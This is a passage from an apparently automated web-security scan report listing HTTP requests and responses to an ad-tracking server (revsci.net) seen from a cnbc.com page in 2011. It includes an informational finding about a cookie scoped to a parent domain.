udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_uU_2="MLsXtSMNJjhvJZH0ecUcOYG+vkti5qBSWYXLCJubLPmW+Qk/VjEpNZvXbTc7xC8rSTKoOag0BjeUYscljoPMhFn371MBxbkm+zDNtu4lgXhwItrNoqz2GvtdqpxOzsrbA6vCnPt/D349BM2u/nf6SMteTvuGKPqzU6GlFHCK3s/nP2aFoxDUmAYHkCgVG55yBqTpgVw60VJ/mk27qIA7utkEoqNJWO7Lx7ZEgBwbPp+XeViJm97BY8rGBnX439VHAJmSCrWgelbtcr9Jo5K0EbM+mENPHRuoYr5Uwaoo+zNfcBWD8G9rvUfobhHOGbTFT/VEaxkJHEbmWBcMzHhvzgylKrBXyOtYuTndjuUbak/+PKnZHxw+Z1lDxefStpRSauQa1v0yq8+YCfD0WKDJdcqFZU4YP0Y8mi7xLdoVMFMbxjAT8FYMOmjyi1pw9k20kW2K1UNr+kVfuNWRG+eA66QVJm7fMmrhr29dkWitV5oWskAFjoZT5m4xtlqGXsKxgNDJbezFtzVy9RbU4W3Txe9/nMZpQnDiJRK1jhIcYFYgrXCyiK943d06XaKo/EAnmoI1yiZisOt6HMzbo/IOtd8umNV7XvCkK13wl8gQxY/bolS81MkGgPC+FCddJYQAgDdUA9IDGpwuw//sYXzAPnVVKMVZjqVWqCkfZ/5yHZ52Vb/UVpgoaqnUJJ64OMU2/GFCeRzXGYsm9/MibFWQVm4HTM6KIaHJ5mzyFMnm7R9cySNe9jWELw9snyXMl6ZdhgGNkCj4I+7zi/8omDDHgIZctJOtui4W1zpUPsY6VLbJDvdmvVLfqMm7kri8i4nh92rC5RmL3eiS4thMuKIkdysec7bIjQOAcM7WeFXLjxzZOyz4hNM/6SbhzanEwkgrRwiuyUf7aGp4krUhR2UGf7M9VXYf40M4yF69bx+btTeOVRkV0h0YGc7SgBQuyQ9AiQ1eccy6xWHkkstE2ArWpIFqrN1Eiy1A6ddzQmolpsPWkNM8Mu4yQyCNa5JV/J3jgdxa0FM/DhuVGhQFgPgtoVD03kC2JEACv5YlFk6yskc9Yf4pdgm4djTKZP0DsNckxEXmEUPmCr4AWsuscbmHTtG77HERLvNIkIsBHslOlzNwMkkHIOhK0sfmoGpEUWULW2kfR7uEefFxJalE6i9BKwn4cTzBCXhxsDIaZgeWTZGVOB0UXJLY9aTQCQ+ZbiUy8yrq9UaeZcH4DF5j7qpquEdbB72qaKIpmwg8WnR87Xr+BAF1MmJf9UA8yL64yziDd0jTP8X3MijPnPrsu4T0g80zZssOfj7Ij3xv8QCQOeZQnf8b9SbIor4T1LXXRKpdSjikgtRdac/gWyL4izsY+aOXYFbGwpc="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAzFnepwZbEAIrfBzwu6EE8765sab61M93W3IUysgTXLor0LqBSNxCIHMpLMfG++73jkHJpg7Oz8ZDHGqRushnLHAEpFVpmxyDJY1KqlF/Ai8Md6jGPzOhDQMwAtMWuZtluoPvJjt1/wIlffmL+z1yR/GPQqbpTCublp+D1SvzQTV/hOlu9q+R03c4Garq2nu4BnqmL+yUAqBd8D2AZVKLKbRtlSE9+YQQ+3wqeoxaJQkKPVRs7ltrGtxe/LjtkVvNBjM+TVSd3dKS1Rjpf4QZaIEBo2wJUQ5985vsnM6Xh0Jz49Y+srCeHNAWv36gCkVWVFCfTpCea/pKuP9cI47QFxj9rqLQfKCMpF+t0Xxz3gnRUA9vg06c91c3huEAJIEOvQFsuhcQJCvm7KH3+/RrrkLSfd7vtccqe2VEbqYwpmc146fwcieKmdD1YyAMsio171FW1iOZ/PQXqR2f+vJEKzGVR4Pg4TSk1/lyEjjIgAsHcPIJVFCAKyXmIdIfe3ldnGZlhM4VRhMnDmilbgk1/Iv8X1aGFgY98k33aXYrCnkj8b/LEhZmYoPVoLotlKOIBQtN+z1qF9Kliszn+c7T3P1cz/uXY2i6l0xbiRXaEgykbSKdIkLyhx7/83qbWmmYNUKpnqWTE8XPL8t2A646fV/RzIGK5S+EQj3N427UAKI6agTsZiwKC2O4+lAuyLG3GZPw9j3juILXakgnHnSGfSMMThSsg8QuuE7a//YNdMCE+RD4y6h2YlZNuIdKUx0P3FU6LR8SMzhrjhNHvGLuQxAHP1NRBJR54cOZDFkApqHQfnlvjue7u3qhAGbBoq8AtoE+7cYDjZkY9CEpAr5SL9nMn0prNV+AoJKRhZ9f4fbEltuTmrqe1GuajgKVzkKoaPppq4+P/NnUU5/CQShM4qnEk2FNq0eaHunsE027Ph2ffg648dhxsFWKS3PfS4+7MaR3tLDJQsmttES2kV5YG9qFvtjBeKKv8EZO67NlXnFvXjvLhHXZg6ddGROLCeicDmrtE99XDu/SIqshs4AxrjqTDvOi1qdMAf6JRrmRtyS5tC4RD/jw4JSD3ddtqC1sR2BVITX5mzcbk3mUs49AG6xdS2RDS/waf3Ia6lf4L3fVoP1XR1RWKZHVOLUu7dJlypMuKdVrbAWMbtxK6TAcfNT4SVMOgs5i2kKKazsKGdmJPVsNL/iG5AQCdWcKvR685TBKy1capdei3AOkD55LYQ/qwkiLMb5e62OYLr5dZil7QfJMYgVwvA3avdi+TsVioT1Ug77Vx8freLeQqdJW8hCwjchKp6DQJpWEyYmKZDEggazlohs3ZmiZfZQ7A7bsKEITRwzdM9X70OlwHYt+hsWMFc9s0Bf0aeL7dhs6PGZbtPwGvM0Sk5ZTAmCy+Yl3ZrBcfvyIuWWBw5c09txjbo+zpeHeXob6DO0lEP75W2fyeORCjm3z0Gz8ps08RdcRXXOT0s1KgRCyz13n8O2T8/848xHA14DoiHX8fEof/XR2z3h0gQv/xNgL+ki9xOBEQJAn6W/hrgjSv+gWk2gft+cK2SHWBh2qLMUSW3AlEN04aw4TM0riArCx81VpWYD56Bv53odUAL4argdVU/bnBw0bLNqOOEKuxh1J7bzE/ANaNT+pDLc0KiQH0T/rgjwb5k741jJT3hXDBk9w/GxvyvbMp7+kswOkdSxtex01062wYIyL5aqx0ZMcRKvASY8sKHtYI5T30DBFTEceuIvDlA=="; rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLYF/VVzHG2gQ4O3XYqvOoReJg2v9kDss6IjN7mzUzlazSMGPXkHZECpUXWaKS/4r8ayxCY8Q5860Ap+P+UZVQAaikEhJEmDBgWrCLLolXFs08LFDY6b1kEEVPU2fUq95KM0xTvK5vsHLQ1HvrO7vwC6Uollo50HVa1bmBIenrwYgTPtDy63yzn/pSKcZax/Yvi05VYqWa5GZQ3TVDqa/XVdrZrnUhEbA7JIq7h7IUQYB+enUG2U5S+D0yQGso4UWfJxkS8vSw1tLCjWltXS4D++/j9McbkwLgvixbjuv/4o+4UgNbPnTpjdyLW8hR3ISVMEDmmWOqEHwnGkrdVNsS8fIuvLm2mbtx7s4Y2UpffI2t8m1ZG7WFO067bDfQdgCFAMR40OgyBcQCyE+LT1Idxv9GNAvO0EEkjiVmCmz28iHPQMOtobKY0yAn8fMLaKQl/8y31uxsov8Clr16BF+bcj/dPRmIQueXHJ3ApV+oIIFKjnifqOD2eT+k2t9leORiVxqX1TwGF476qY3I94DFIjRgO7EmLli9k/61gwo7cQGxBxDqkkERIdXG+1bmb6D5yN5UrYYVi5S7MylJge30CAKAVR2U7emU6xBiVK4I9aGp2AUbfSXdvevaNMc=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EmhOHMQDruItGF29/x0GEv1FuZbSAKOIGTN8cJSum2Np/CoReJg2v9kDss6IjPbyobQAwvhLAH2SBYVS4Aca2ROPVNOf1VWh+hEqPiqU0bhReIUafnkll3Rq9pruA1HphVsEataiCU4UsktlzVfsKcjSNKUW1ejPUGnrIUMmJ/opL+XBEJqalRFxzz++kuS0r8FA3xbmxB0VW/Fj5TEabsOCs6WjLf8zGKgiUktukxMj4LRehj9yYi7ERIGSj2wgMLjYe9onk6Nwnq1w3cSQz3lezvtsbXogCw5eLcQk7BBWC7AW34FiS6I5I3AMgwXW1+vQct44E8GL/+uZkCF26JWxr4OFg1zCE1hL+og3Ccye+ofAbs5lQhLD9O83gErv0udsw/ULLAXaFrXjIiO+lA4jXrT+Ql6y65lgdTwb7TYQTBMO7cEQ8+JtiHkjuNuCqQrJrA3t1Ab11SQmEzmh1+QCx6igOMxs2lVuCTKOpLCvXWusFMASdzNqMIm1KLwwD840D4c7y3Rshr5o/BgIwNLJUAZ52Q2cRjtmFe+Zr6mqja6lLLnOAJfc5T253oyAq1j4VvExFVkpa4M3kMBXazOIbOJwTO0rd2IVV+hddDV35gc+cnDCJZgSt6tge7B7qFfWLJUvsHU7uuprAFoFQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:01:30 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:01:29 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.167. http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/602675862.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp7h79CrB4Ypq8bZnedKYjOdeMOLsfi9HQE4saI/5RCJ9y8KLVFBw8+lYpjeoXfA1XWRQVqFbpXIMebkFXbQTE0xZdhpXd5uEOtyRc5a9K0dGFurx7gbrpmSvOkvWFCio+FP0JQCTYI/GDlR49/dY9ZfMvjNnvHmhLSbOD53X/RpoOV+D6ALESZffv/i0W97GqjPQl/Kqwta7Xdie2YUVoBUFjm2t0nNgDo+J3dP7Gt3ux82wtMOhk5x6cxdWutYa3kuEk6WTSaxb70PIiEUKLccPI1VuCaDDvg1Edipckrskd1Nb6rxmRcc+f4M8WJ2UQMlHGOaxigcXc4y5OkRY6hyts5L0VV44xa9kOSOGtNl1XmFcb5itfqZcNSgUDe3KrPyZ8TiE7cd+rDIi6bGQAwxkT6iazM2fg6WACXbPyCvVQfzKy25O2Rfo4nUNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:27:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/602675862.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfn